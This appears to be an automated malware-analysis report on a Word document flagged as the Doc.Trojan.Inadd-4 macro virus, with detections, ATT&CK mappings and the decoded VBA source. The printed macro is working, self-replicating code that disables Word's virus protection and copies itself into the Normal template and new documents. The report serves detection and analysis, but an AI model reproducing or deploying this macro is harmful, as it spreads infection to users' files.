MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to infect the Normal template. This infection mechanism suggests an attempt to achieve persistence by ensuring the macro runs with future documents. The macro code itself is designed to copy its own content into the Normal template if it's not already present, and to save the active document if it's the Normal template itself, indicating a self-propagation or persistence strategy.
Heuristics 3
-
ClamAV: Doc.Trojan.Inadd-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Inadd-4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1189 bytes |
SHA-256: 1665b31d768937b3413471b0dde663a84c1d2dea733acbd94f4371108b7b8777 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False Options.SaveNormalPrompt = False If MacroContainer.FullName = NormalTemplate.FullName Then Set Infect = ActiveDocument.VBProject.vbcomponents(1).codemodule: SaveIt = 1 If MacroContainer.FullName = ActiveDocument.FullName Then Set Infect = NormalTemplate.VBProject.vbcomponents(1).codemodule If Infect.countoflines < 1 Then Infect.addfromstring MacroContainer.VBProject.vbcomponents(1).codemodule.lines(1, MacroContainer.VBProject.vbcomponents(1).codemodule.countoflines) If SaveIt = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument Payload: End Sub Private Sub document_new() Set Norm = NormalTemplate.VBProject.vbcomponents(1).codemodule Set Active = ActiveDocument.VBProject.vbcomponents(1).codemodule Active.addfromstring Norm.lines(1, Norm.countoflines) ActiveDocument.Saved = True End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.